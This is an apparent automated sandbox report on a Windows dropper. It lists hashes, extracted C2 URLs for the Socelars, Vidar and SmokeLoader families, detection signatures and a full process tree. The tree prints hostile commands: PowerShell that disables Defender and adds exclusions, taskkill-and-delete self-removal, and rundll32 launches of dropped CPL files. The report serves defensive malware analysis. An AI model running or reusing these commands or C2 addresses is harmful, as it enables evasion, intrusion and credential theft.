Analysis

  • max time kernel
    128s
  • max time network
    166s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    20/12/2021, 14:04

General

  • Target

    1cf8b07078eeb719059ca5f31898d2252fb9c92077e0646900f14914c15a8098.exe

  • Size

    7.1MB

  • MD5

    d866d58ec1615ca95161e0f83c13dd73

  • SHA1

    258f6d8adaa4f6fad03a603c6a034b40cf731558

  • SHA256

    1cf8b07078eeb719059ca5f31898d2252fb9c92077e0646900f14914c15a8098

  • SHA512

    bc557b5c8ea1999aa101de52f23401b83b8d7c09990582cab9a17110ced814149101084b8e98948d81b401cc6e7b34a128930a860449b4378f5216a23a78cf3e

Malware Config

Extracted

Family

socelars

C2

http://www.biohazardgraphics.com/

Extracted

Family

vidar

Version

49.1

Botnet

915

C2

https://noc.social/@sergeev46

https://c.im/@sergeev47

Attributes
  • profile_id

    915

Extracted

Family

smokeloader

Version

2020

C2

http://rcacademy.at/upload/

http://e-lanpengeonline.com/upload/

http://vjcmvz.cn/upload/

http://galala.ru/upload/

http://witra.ru/upload/

rc4.i32
rc4.i32

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 2 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 3 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE GCleaner Downloader Activity M5

    suricata: ET MALWARE GCleaner Downloader Activity M5

  • suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)

    suricata: ET MALWARE Single char EXE direct download likely trojan (multiple families)

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

    suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

  • NirSoft WebBrowserPassView 3 IoCs

    Password recovery tool for various web browsers

  • Nirsoft 3 IoCs
  • Vidar Stealer 2 IoCs
  • ASPack v2.12-2.42 6 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 32 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Looks up geolocation information via web service

    Uses a legitimate geolocation service to find the infected system's geolocation info.

  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies data under HKEY_USERS 7 IoCs
  • Modifies registry class 19 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\services.exe
    C:\Windows\system32\services.exe
    1⤵
      PID:468
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Suspicious use of SetThreadContext
        • Modifies registry class
        • Suspicious use of AdjustPrivilegeToken
        PID:896
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k SystemNetworkService
        2⤵
        • Drops file in System32 directory
        • Checks processor information in registry
        • Modifies data under HKEY_USERS
        • Modifies registry class
        PID:3024
    • C:\Users\Admin\AppData\Local\Temp\1cf8b07078eeb719059ca5f31898d2252fb9c92077e0646900f14914c15a8098.exe
      "C:\Users\Admin\AppData\Local\Temp\1cf8b07078eeb719059ca5f31898d2252fb9c92077e0646900f14914c15a8098.exe"
      1⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:676
      • C:\Users\Admin\AppData\Local\Temp\7zS4A2CAA16\setup_install.exe
        "C:\Users\Admin\AppData\Local\Temp\7zS4A2CAA16\setup_install.exe"
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1376
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
          3⤵
            PID:1540
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
              4⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1604
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
            3⤵
              PID:1380
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                4⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:744
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c Sat04e9d8f172e50.exe /mixtwo
              3⤵
              • Loads dropped DLL
              PID:844
              • C:\Users\Admin\AppData\Local\Temp\7zS4A2CAA16\Sat04e9d8f172e50.exe
                Sat04e9d8f172e50.exe /mixtwo
                4⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                PID:856
                • C:\Users\Admin\AppData\Local\Temp\7zS4A2CAA16\Sat04e9d8f172e50.exe
                  Sat04e9d8f172e50.exe /mixtwo
                  5⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  PID:1680
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c taskkill /im "Sat04e9d8f172e50.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS4A2CAA16\Sat04e9d8f172e50.exe" & exit
                    6⤵
                      PID:2208
                      • C:\Windows\SysWOW64\taskkill.exe
                        taskkill /im "Sat04e9d8f172e50.exe" /f
                        7⤵
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2296
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c Sat0475667e2de8c3.exe
                3⤵
                • Loads dropped DLL
                PID:1332
                • C:\Users\Admin\AppData\Local\Temp\7zS4A2CAA16\Sat0475667e2de8c3.exe
                  Sat0475667e2de8c3.exe
                  4⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1712
                  • C:\Users\Admin\AppData\Local\4e34fab2-19db-4444-827b-3a0099f2ab2a.exe
                    "C:\Users\Admin\AppData\Local\4e34fab2-19db-4444-827b-3a0099f2ab2a.exe"
                    5⤵
                    • Executes dropped EXE
                    PID:1648
                  • C:\Users\Admin\AppData\Local\45b41dad-d692-4ff1-bdf2-f8e009d1fe35.exe
                    "C:\Users\Admin\AppData\Local\45b41dad-d692-4ff1-bdf2-f8e009d1fe35.exe"
                    5⤵
                    • Executes dropped EXE
                    • Adds Run key to start application
                    PID:980
                    • C:\Users\Admin\AppData\Roaming\50807429\1733410217334102.exe
                      "C:\Users\Admin\AppData\Roaming\50807429\1733410217334102.exe"
                      6⤵
                      • Executes dropped EXE
                      PID:1720
                  • C:\Users\Admin\AppData\Local\cb793e72-0c44-4685-b0da-c9e7b83649e5.exe
                    "C:\Users\Admin\AppData\Local\cb793e72-0c44-4685-b0da-c9e7b83649e5.exe"
                    5⤵
                    • Executes dropped EXE
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    PID:2516
                  • C:\Users\Admin\AppData\Local\a0860072-effc-4d87-8899-64bbab380817.exe
                    "C:\Users\Admin\AppData\Local\a0860072-effc-4d87-8899-64bbab380817.exe"
                    5⤵
                    • Executes dropped EXE
                    PID:2752
                  • C:\Users\Admin\AppData\Local\5585ca05-db7c-4475-a217-7678d6765a74.exe
                    "C:\Users\Admin\AppData\Local\5585ca05-db7c-4475-a217-7678d6765a74.exe"
                    5⤵
                    • Executes dropped EXE
                    PID:2896
                    • C:\Users\Admin\AppData\Roaming\4243265.exe
                      "C:\Users\Admin\AppData\Roaming\4243265.exe"
                      6⤵
                      • Executes dropped EXE
                      PID:3032
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c Sat04d99657076.exe
                3⤵
                • Loads dropped DLL
                PID:2020
                • C:\Users\Admin\AppData\Local\Temp\7zS4A2CAA16\Sat04d99657076.exe
                  Sat04d99657076.exe
                  4⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Checks SCSI registry key(s)
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious behavior: MapViewOfSection
                  PID:980
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c Sat049b33b1be29125.exe
                3⤵
                • Loads dropped DLL
                PID:636
                • C:\Users\Admin\AppData\Local\Temp\7zS4A2CAA16\Sat049b33b1be29125.exe
                  Sat049b33b1be29125.exe
                  4⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  PID:1552
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 1552 -s 860
                    5⤵
                    • Program crash
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2388
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c Sat047cc0debc59.exe
                3⤵
                • Loads dropped DLL
                PID:1852
                • C:\Users\Admin\AppData\Local\Temp\7zS4A2CAA16\Sat047cc0debc59.exe
                  Sat047cc0debc59.exe
                  4⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  PID:776
                  • C:\Users\Admin\AppData\Local\Temp\is-IKTQ4.tmp\Sat047cc0debc59.tmp
                    "C:\Users\Admin\AppData\Local\Temp\is-IKTQ4.tmp\Sat047cc0debc59.tmp" /SL5="$5011C,140047,56320,C:\Users\Admin\AppData\Local\Temp\7zS4A2CAA16\Sat047cc0debc59.exe"
                    5⤵
                    • Executes dropped EXE
                    PID:1000
                    • C:\Users\Admin\AppData\Local\Temp\is-OSKS2.tmp\Tougay.exe
                      "C:\Users\Admin\AppData\Local\Temp\is-OSKS2.tmp\Tougay.exe" /S /UID=91
                      6⤵
                      • Drops file in Drivers directory
                      • Executes dropped EXE
                      • Adds Run key to start application
                      • Drops file in Program Files directory
                      PID:2592
                      • C:\Users\Admin\AppData\Local\Temp\e7-f4e05-8cc-deeb2-aa8fd5fe59991\Sohaezhihisy.exe
                        "C:\Users\Admin\AppData\Local\Temp\e7-f4e05-8cc-deeb2-aa8fd5fe59991\Sohaezhihisy.exe"
                        7⤵
                        • Executes dropped EXE
                        PID:2040
                        • C:\Program Files\Internet Explorer\iexplore.exe
                          "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
                          8⤵
                            PID:1384
                        • C:\Users\Admin\AppData\Local\Temp\88-bb2b0-0bf-25da5-336a712fdeb2f\Tekiqulezhu.exe
                          "C:\Users\Admin\AppData\Local\Temp\88-bb2b0-0bf-25da5-336a712fdeb2f\Tekiqulezhu.exe"
                          7⤵
                          • Executes dropped EXE
                          PID:1196
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" /c start https://iplogger.org/1rpHg7
                          7⤵
                            PID:1224
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c Sat04951cf2a61625.exe
                    3⤵
                    • Loads dropped DLL
                    PID:1708
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c Sat04cf04f0504c7.exe
                    3⤵
                    • Loads dropped DLL
                    PID:1736
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c Sat04091e9a4f.exe
                    3⤵
                    • Loads dropped DLL
                    PID:1480
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c Sat0413d2f09b96ff.exe
                    3⤵
                    • Loads dropped DLL
                    PID:556
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c Sat04efd3813d34d2686.exe
                    3⤵
                    • Loads dropped DLL
                    PID:1456
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c Sat04582c0a08.exe
                    3⤵
                    • Loads dropped DLL
                    PID:1256
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c Sat0448d9fa84aca6c1.exe
                    3⤵
                    • Loads dropped DLL
                    PID:1964
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c Sat0440a840bf678986a.exe
                    3⤵
                    • Loads dropped DLL
                    PID:1016
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c Sat045fe73e29fa5e0b2.exe
                    3⤵
                    • Loads dropped DLL
                    PID:1836
              • C:\Users\Admin\AppData\Local\Temp\7zS4A2CAA16\Sat0448d9fa84aca6c1.exe
                Sat0448d9fa84aca6c1.exe
                1⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious use of AdjustPrivilegeToken
                PID:1084
                • C:\Users\Admin\AppData\Local\Temp\7zS4A2CAA16\Sat0448d9fa84aca6c1.exe
                  C:\Users\Admin\AppData\Local\Temp\7zS4A2CAA16\Sat0448d9fa84aca6c1.exe
                  2⤵
                  • Executes dropped EXE
                  PID:2132
              • C:\Users\Admin\AppData\Local\Temp\7zS4A2CAA16\Sat04091e9a4f.exe
                Sat04091e9a4f.exe
                1⤵
                • Executes dropped EXE
                PID:1620
              • C:\Users\Admin\AppData\Local\Temp\7zS4A2CAA16\Sat04efd3813d34d2686.exe
                Sat04efd3813d34d2686.exe
                1⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:1768
                • C:\Windows\SysWOW64\control.exe
                  "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\1S3Y.CPl",
                  2⤵
                    PID:2528
                    • C:\Windows\SysWOW64\rundll32.exe
                      "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\1S3Y.CPl",
                      3⤵
                        PID:2636
                  • C:\Users\Admin\AppData\Local\Temp\7zS4A2CAA16\Sat04cf04f0504c7.exe
                    Sat04cf04f0504c7.exe
                    1⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    PID:1840
                    • C:\Users\Admin\AppData\Local\Temp\is-9GED9.tmp\Sat04cf04f0504c7.tmp
                      "C:\Users\Admin\AppData\Local\Temp\is-9GED9.tmp\Sat04cf04f0504c7.tmp" /SL5="$10178,870426,780800,C:\Users\Admin\AppData\Local\Temp\7zS4A2CAA16\Sat04cf04f0504c7.exe"
                      2⤵
                      • Executes dropped EXE
                      PID:1976
                      • C:\Users\Admin\AppData\Local\Temp\7zS4A2CAA16\Sat04cf04f0504c7.exe
                        "C:\Users\Admin\AppData\Local\Temp\7zS4A2CAA16\Sat04cf04f0504c7.exe" /SILENT
                        3⤵
                        • Executes dropped EXE
                        PID:1660
                  • C:\Users\Admin\AppData\Local\Temp\7zS4A2CAA16\Sat045fe73e29fa5e0b2.exe
                    Sat045fe73e29fa5e0b2.exe
                    1⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    PID:1100
                    • C:\Windows\SysWOW64\control.exe
                      "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\JQOzcH.CPL",
                      2⤵
                        PID:2520
                        • C:\Windows\SysWOW64\rundll32.exe
                          "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\JQOzcH.CPL",
                          3⤵
                            PID:2628
                      • C:\Users\Admin\AppData\Local\Temp\7zS4A2CAA16\Sat04951cf2a61625.exe
                        Sat04951cf2a61625.exe
                        1⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        PID:1716
                        • C:\Users\Admin\AppData\Local\Temp\7zS4A2CAA16\Sat04951cf2a61625.exe
                          "C:\Users\Admin\AppData\Local\Temp\7zS4A2CAA16\Sat04951cf2a61625.exe" -u
                          2⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          PID:1748
                      • C:\Users\Admin\AppData\Local\Temp\7zS4A2CAA16\Sat0413d2f09b96ff.exe
                        Sat0413d2f09b96ff.exe
                        1⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Modifies system certificate store
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1760
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 1760 -s 1440
                          2⤵
                          • Program crash
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2420
                      • C:\Users\Admin\AppData\Local\Temp\7zS4A2CAA16\Sat04582c0a08.exe
                        Sat04582c0a08.exe
                        1⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of SetThreadContext
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1872
                        • C:\Users\Admin\AppData\Local\Temp\7zS4A2CAA16\Sat04582c0a08.exe
                          C:\Users\Admin\AppData\Local\Temp\7zS4A2CAA16\Sat04582c0a08.exe
                          2⤵
                          • Executes dropped EXE
                          PID:2012
                      • C:\Users\Admin\AppData\Local\Temp\7zS4A2CAA16\Sat0440a840bf678986a.exe
                        Sat0440a840bf678986a.exe
                        1⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Checks processor information in registry
                        PID:1092
                        • C:\Windows\SysWOW64\cmd.exe
                          "C:\Windows\System32\cmd.exe" /c taskkill /im Sat0440a840bf678986a.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zS4A2CAA16\Sat0440a840bf678986a.exe" & del C:\ProgramData\*.dll & exit
                          2⤵
                            PID:2764
                            • C:\Windows\SysWOW64\taskkill.exe
                              taskkill /im Sat0440a840bf678986a.exe /f
                              3⤵
                              • Kills process with taskkill
                              PID:1184
                            • C:\Windows\SysWOW64\timeout.exe
                              timeout /t 6
                              3⤵
                              • Delays execution with timeout.exe
                              PID:932
                        • C:\Windows\system32\rundll32.exe
                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                          1⤵
                          • Process spawned unexpected child process
                          PID:2900
                          • C:\Windows\SysWOW64\rundll32.exe
                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                            2⤵
                            • Modifies registry class
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2960

                        Network

                              MITRE ATT&CK Enterprise v6

                              Replay Monitor

                              Loading Replay Monitor...

                              Downloads

                              • memory/676-54-0x00000000766D1000-0x00000000766D3000-memory.dmp

                                Filesize

                                8KB

                              • memory/744-263-0x0000000001E30000-0x0000000002A7A000-memory.dmp

                                Filesize

                                12.3MB

                              • memory/744-231-0x0000000001E30000-0x0000000002A7A000-memory.dmp

                                Filesize

                                12.3MB

                              • memory/776-211-0x0000000000400000-0x0000000000414000-memory.dmp

                                Filesize

                                80KB

                              • memory/896-276-0x0000000000FB0000-0x0000000001022000-memory.dmp

                                Filesize

                                456KB

                              • memory/896-275-0x0000000000A20000-0x0000000000A6D000-memory.dmp

                                Filesize

                                308KB

                              • memory/980-242-0x0000000000400000-0x00000000004CC000-memory.dmp

                                Filesize

                                816KB

                              • memory/980-238-0x0000000000610000-0x0000000000620000-memory.dmp

                                Filesize

                                64KB

                              • memory/980-241-0x0000000000240000-0x0000000000249000-memory.dmp

                                Filesize

                                36KB

                              • memory/1000-229-0x00000000002E0000-0x00000000002E1000-memory.dmp

                                Filesize

                                4KB

                              • memory/1084-218-0x0000000000DC0000-0x0000000000DC1000-memory.dmp

                                Filesize

                                4KB

                              • memory/1084-235-0x0000000000BB0000-0x0000000000BB1000-memory.dmp

                                Filesize

                                4KB

                              • memory/1084-240-0x00000000002D0000-0x000000000035C000-memory.dmp

                                Filesize

                                560KB

                              • memory/1092-215-0x00000000009C0000-0x0000000000A3D000-memory.dmp

                                Filesize

                                500KB

                              • memory/1092-224-0x0000000000400000-0x0000000000539000-memory.dmp

                                Filesize

                                1.2MB

                              • memory/1092-221-0x0000000001E80000-0x0000000001F59000-memory.dmp

                                Filesize

                                868KB

                              • memory/1196-345-0x00000000009F0000-0x00000000009F2000-memory.dmp

                                Filesize

                                8KB

                              • memory/1276-243-0x00000000029B0000-0x00000000029C6000-memory.dmp

                                Filesize

                                88KB

                              • memory/1376-76-0x000000006B440000-0x000000006B4CF000-memory.dmp

                                Filesize

                                572KB

                              • memory/1376-80-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                                Filesize

                                1.5MB

                              • memory/1376-83-0x000000006B280000-0x000000006B2A6000-memory.dmp

                                Filesize

                                152KB

                              • memory/1376-84-0x000000006B280000-0x000000006B2A6000-memory.dmp

                                Filesize

                                152KB

                              • memory/1376-81-0x0000000064940000-0x0000000064959000-memory.dmp

                                Filesize

                                100KB

                              • memory/1376-85-0x0000000064940000-0x0000000064959000-memory.dmp

                                Filesize

                                100KB

                              • memory/1376-82-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                                Filesize

                                1.5MB

                              • memory/1376-79-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                                Filesize

                                1.5MB

                              • memory/1376-88-0x000000006B440000-0x000000006B4CF000-memory.dmp

                                Filesize

                                572KB

                              • memory/1376-87-0x0000000064940000-0x0000000064959000-memory.dmp

                                Filesize

                                100KB

                              • memory/1376-86-0x0000000064940000-0x0000000064959000-memory.dmp

                                Filesize

                                100KB

                              • memory/1376-77-0x000000006B440000-0x000000006B4CF000-memory.dmp

                                Filesize

                                572KB

                              • memory/1376-89-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                                Filesize

                                1.5MB

                              • memory/1376-78-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                                Filesize

                                1.5MB

                              • memory/1376-75-0x000000006B440000-0x000000006B4CF000-memory.dmp

                                Filesize

                                572KB

                              • memory/1604-233-0x0000000001EB0000-0x0000000002AFA000-memory.dmp

                                Filesize

                                12.3MB

                              • memory/1604-261-0x0000000001EB0000-0x0000000002AFA000-memory.dmp

                                Filesize

                                12.3MB

                              • memory/1604-230-0x0000000001EB0000-0x0000000002AFA000-memory.dmp

                                Filesize

                                12.3MB

                              • memory/1648-311-0x0000000000A80000-0x0000000000A81000-memory.dmp

                                Filesize

                                4KB

                              • memory/1680-199-0x0000000000400000-0x0000000000450000-memory.dmp

                                Filesize

                                320KB

                              • memory/1680-200-0x0000000000400000-0x0000000000450000-memory.dmp

                                Filesize

                                320KB

                              • memory/1680-206-0x0000000000400000-0x0000000000450000-memory.dmp

                                Filesize

                                320KB

                              • memory/1680-207-0x0000000000400000-0x0000000000450000-memory.dmp

                                Filesize

                                320KB

                              • memory/1712-223-0x0000000000BA0000-0x0000000000BA1000-memory.dmp

                                Filesize

                                4KB

                              • memory/1712-259-0x0000000004AC0000-0x0000000004AC1000-memory.dmp

                                Filesize

                                4KB

                              • memory/1712-232-0x0000000000360000-0x0000000000361000-memory.dmp

                                Filesize

                                4KB

                              • memory/1720-342-0x000000001ADF0000-0x000000001ADF2000-memory.dmp

                                Filesize

                                8KB

                              • memory/1840-213-0x0000000000400000-0x00000000004CC000-memory.dmp

                                Filesize

                                816KB

                              • memory/1872-234-0x0000000000A30000-0x0000000000A31000-memory.dmp

                                Filesize

                                4KB

                              • memory/1872-239-0x00000000001E0000-0x00000000001E1000-memory.dmp

                                Filesize

                                4KB

                              • memory/1872-219-0x0000000000C00000-0x0000000000C01000-memory.dmp

                                Filesize

                                4KB

                              • memory/1976-225-0x0000000000260000-0x0000000000261000-memory.dmp

                                Filesize

                                4KB

                              • memory/2012-301-0x0000000004D30000-0x0000000004D31000-memory.dmp

                                Filesize

                                4KB

                              • memory/2132-302-0x00000000005D0000-0x00000000005D1000-memory.dmp

                                Filesize

                                4KB

                              • memory/2388-267-0x0000000000340000-0x0000000000369000-memory.dmp

                                Filesize

                                164KB

                              • memory/2420-268-0x0000000000E10000-0x0000000000E11000-memory.dmp

                                Filesize

                                4KB

                              • memory/2516-303-0x0000000000380000-0x00000000003C5000-memory.dmp

                                Filesize

                                276KB

                              • memory/2592-262-0x00000000003F0000-0x00000000003F2000-memory.dmp

                                Filesize

                                8KB

                              • memory/2628-266-0x0000000000190000-0x0000000000191000-memory.dmp

                                Filesize

                                4KB

                              • memory/2636-264-0x00000000001C0000-0x00000000001C1000-memory.dmp

                                Filesize

                                4KB

                              • memory/2752-318-0x00000000002C0000-0x0000000000305000-memory.dmp

                                Filesize

                                276KB

                              • memory/2896-324-0x0000000000C70000-0x0000000000C71000-memory.dmp

                                Filesize

                                4KB

                              • memory/2960-272-0x0000000001CF0000-0x0000000001DF1000-memory.dmp

                                Filesize

                                1.0MB

                              • memory/2960-274-0x00000000007F0000-0x000000000084D000-memory.dmp

                                Filesize

                                372KB

                              • memory/3024-277-0x0000000000460000-0x00000000004D2000-memory.dmp

                                Filesize

                                456KB

                              • memory/3024-348-0x0000000002020000-0x0000000002049000-memory.dmp

                                Filesize

                                164KB

                              • memory/3024-349-0x0000000003250000-0x0000000003355000-memory.dmp

                                Filesize

                                1.0MB

                              • memory/3024-347-0x0000000001C90000-0x0000000001CAB000-memory.dmp

                                Filesize

                                108KB